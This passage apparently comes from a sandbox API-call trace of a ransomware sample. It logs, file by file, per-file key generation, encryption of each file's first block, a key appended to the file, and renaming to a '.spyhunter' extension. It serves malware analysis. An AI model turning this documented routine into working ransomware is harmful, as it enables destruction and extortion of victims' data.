[0129.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.917] GetProcessHeap () returned 0x2c0000 [0129.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.917] GetProcessHeap () returned 0x2c0000 [0129.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ceb8 | out: hHeap=0x2c0000) returned 1 [0129.922] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f740 | out: pbBuffer=0x248f740) returned 1 [0129.922] GetProcessHeap () returned 0x2c0000 [0129.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.923] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f738*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f738*=0x30) returned 1 [0129.923] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.923] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0129.923] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".txt") returned 0x0 [0129.923] GetProcessHeap () returned 0x2c0000 [0129.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.923] ReadFile (in: hFile=0x158, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f6fc*=0x2800, lpOverlapped=0x0) returned 1 [0129.967] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.967] WriteFile (in: hFile=0x158, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f6fc*=0x2800, lpOverlapped=0x0) returned 1 [0129.968] GetProcessHeap () returned 0x2c0000 [0129.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.968] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.968] WriteFile (in: hFile=0x158, lpBuffer=0x248f73c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6fc, lpOverlapped=0x0 | out: lpBuffer=0x248f73c*, lpNumberOfBytesWritten=0x248f6fc*=0x4, lpOverlapped=0x0) returned 1 [0129.970] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6fc*=0x30, lpOverlapped=0x0) returned 1 [0129.970] CloseHandle (hObject=0x158) returned 1 [0129.970] GetProcessHeap () returned 0x2c0000 [0129.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.970] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.spyhunter") returned 131 [0129.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.spyhunter" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.spyhunter")) returned 1 [0129.971] GetProcessHeap () returned 0x2c0000 [0129.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.971] GetProcessHeap () returned 0x2c0000 [0129.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.971] GetProcessHeap () returned 0x2c0000 [0129.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3bfc8 | out: hHeap=0x2c0000) returned 1 [0129.971] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f740 | out: pbBuffer=0x248f740) returned 1 [0129.971] GetProcessHeap () returned 0x2c0000 [0129.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.972] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f738*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f738*=0x30) returned 1 [0129.972] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.973] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0129.973] StrStrW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.973] GetProcessHeap () returned 0x2c0000 [0129.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.973] ReadFile (in: hFile=0x158, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f6fc*=0x158, lpOverlapped=0x0) returned 1 [0129.974] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.974] WriteFile (in: hFile=0x158, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x248f6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f6fc*=0x158, lpOverlapped=0x0) returned 1 [0129.974] GetProcessHeap () returned 0x2c0000 [0129.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.974] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.974] WriteFile (in: hFile=0x158, lpBuffer=0x248f73c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6fc, lpOverlapped=0x0 | out: lpBuffer=0x248f73c*, lpNumberOfBytesWritten=0x248f6fc*=0x4, lpOverlapped=0x0) returned 1 [0129.975] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6fc*=0x30, lpOverlapped=0x0) returned 1 [0129.975] CloseHandle (hObject=0x158) returned 1 [0129.975] GetProcessHeap () returned 0x2c0000 [0129.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.975] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.spyhunter") returned 67 [0129.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn.spyhunter")) returned 1 [0129.976] GetProcessHeap () returned 0x2c0000 [0129.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.976] GetProcessHeap () returned 0x2c0000 [0129.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.976] GetProcessHeap () returned 0x2c0000 [0129.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cbb8 | out: hHeap=0x2c0000) returned 1 [0129.976] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f738 | out: pbBuffer=0x248f738) returned 1 [0129.976] GetProcessHeap () returned 0x2c0000 [0129.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.976] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f730*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f730*=0x30) returned 1 [0129.976] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.978] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0129.978] StrStrW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.978] GetProcessHeap () returned 0x2c0000 [0129.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.978] ReadFile (in: hFile=0x158, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f6f4*=0x16a, lpOverlapped=0x0) returned 1 [0129.979] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.979] WriteFile (in: hFile=0x158, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x248f6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f6f4*=0x16a, lpOverlapped=0x0) returned 1 [0129.979] GetProcessHeap () returned 0x2c0000 [0129.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.979] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.979] WriteFile (in: hFile=0x158, lpBuffer=0x248f734*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6f4, lpOverlapped=0x0 | out: lpBuffer=0x248f734*, lpNumberOfBytesWritten=0x248f6f4*=0x4, lpOverlapped=0x0) returned 1 [0129.979] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6f4*=0x30, lpOverlapped=0x0) returned 1 [0129.979] CloseHandle (hObject=0x158) returned 1 [0129.979] GetProcessHeap () returned 0x2c0000 [0129.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.980] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.spyhunter") returned 70 [0129.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn.spyhunter")) returned 1 [0129.980] GetProcessHeap () returned 0x2c0000 [0129.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.980] GetProcessHeap () returned 0x2c0000 [0129.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.981] GetProcessHeap () returned 0x2c0000 [0129.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84fd8 | out: hHeap=0x2c0000) returned 1 [0129.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f738 | out: pbBuffer=0x248f738) returned 1 [0129.981] GetProcessHeap () returned 0x2c0000 [0129.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f730*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f730*=0x30) returned 1 [0129.981] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.981] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0129.981] StrStrW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.981] GetProcessHeap () returned 0x2c0000 [0129.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.982] ReadFile (in: hFile=0x158, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f6f4*=0x152, lpOverlapped=0x0) returned 1 [0129.982] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.983] WriteFile (in: hFile=0x158, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x248f6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f6f4*=0x152, lpOverlapped=0x0) returned 1 [0129.983] GetProcessHeap () returned 0x2c0000 [0129.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.983] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.983] WriteFile (in: hFile=0x158, lpBuffer=0x248f734*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6f4, lpOverlapped=0x0 | out: lpBuffer=0x248f734*, lpNumberOfBytesWritten=0x248f6f4*=0x4, lpOverlapped=0x0) returned 1 [0129.983] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6f4*=0x30, lpOverlapped=0x0) returned 1 [0129.983] CloseHandle (hObject=0x158) returned 1 [0129.985] GetProcessHeap () returned 0x2c0000 [0129.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.985] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.spyhunter") returned 66 [0129.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn.spyhunter")) returned 1 [0129.986] GetProcessHeap () returned 0x2c0000 [0129.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.986] GetProcessHeap () returned 0x2c0000 [0129.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.986] GetProcessHeap () returned 0x2c0000 [0129.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2caf8 | out: hHeap=0x2c0000) returned 1 [0129.986] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f730 | out: pbBuffer=0x248f730) returned 1 [0129.986] GetProcessHeap () returned 0x2c0000 [0129.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.986] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f728*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f728*=0x30) returned 1 [0129.986] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.987] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0129.987] StrStrW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.987] GetProcessHeap () returned 0x2c0000 [0129.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.987] ReadFile (in: hFile=0x158, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f6ec*=0x152, lpOverlapped=0x0) returned 1 [0129.988] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.988] WriteFile (in: hFile=0x158, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x248f6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f6ec*=0x152, lpOverlapped=0x0) returned 1 [0129.988] GetProcessHeap () returned 0x2c0000 [0129.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.988] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.988] WriteFile (in: hFile=0x158, lpBuffer=0x248f72c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6ec, lpOverlapped=0x0 | out: lpBuffer=0x248f72c*, lpNumberOfBytesWritten=0x248f6ec*=0x4, lpOverlapped=0x0) returned 1 [0129.988] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6ec*=0x30, lpOverlapped=0x0) returned 1 [0129.988] CloseHandle (hObject=0x158) returned 1 [0129.989] GetProcessHeap () returned 0x2c0000 [0129.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.989] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.spyhunter") returned 66 [0129.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn.spyhunter")) returned 1 [0129.989] GetProcessHeap () returned 0x2c0000 [0129.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.989] GetProcessHeap () returned 0x2c0000 [0129.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.989] GetProcessHeap () returned 0x2c0000 [0129.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ca38 | out: hHeap=0x2c0000) returned 1 [0129.990] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f730 | out: pbBuffer=0x248f730) returned 1 [0129.990] GetProcessHeap () returned 0x2c0000 [0129.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.990] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f728*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f728*=0x30) returned 1 [0129.990] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0130.000] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0130.000] StrStrW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".txt") returned 0x0 [0130.000] GetProcessHeap () returned 0x2c0000 [0130.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0130.000] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f6ec*=0x13a, lpOverlapped=0x0) returned 1 [0130.001] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffec6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.001] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x248f6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f6ec*=0x13a, lpOverlapped=0x0) returned 1 [0130.001] GetProcessHeap () returned 0x2c0000 [0130.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0130.001] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.001] WriteFile (in: hFile=0xf0, lpBuffer=0x248f72c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6ec, lpOverlapped=0x0 | out: lpBuffer=0x248f72c*, lpNumberOfBytesWritten=0x248f6ec*=0x4, lpOverlapped=0x0) returned 1 [0130.001] WriteFile (in: hFile=0xf0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6ec*=0x30, lpOverlapped=0x0) returned 1 [0130.001] CloseHandle (hObject=0xf0) returned 1 [0130.001] GetProcessHeap () returned 0x2c0000 [0130.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0130.001] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.spyhunter") returned 62 [0130.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn.spyhunter")) returned 1 [0130.002] GetProcessHeap () returned 0x2c0000 [0130.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0130.002] GetProcessHeap () returned 0x2c0000 [0130.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.002] GetProcessHeap () returned 0x2c0000 [0130.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2338 | out: hHeap=0x2c0000) returned 1 [0130.002] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f728 | out: pbBuffer=0x248f728) returned 1 [0130.002] GetProcessHeap () returned 0x2c0000 [0130.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.002] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f720*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f720*=0x30) returned 1 [0130.003] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0130.003] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0130.003] StrStrW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0130.003] GetProcessHeap () returned 0x2c0000 [0130.003] RtlAllocateHeap 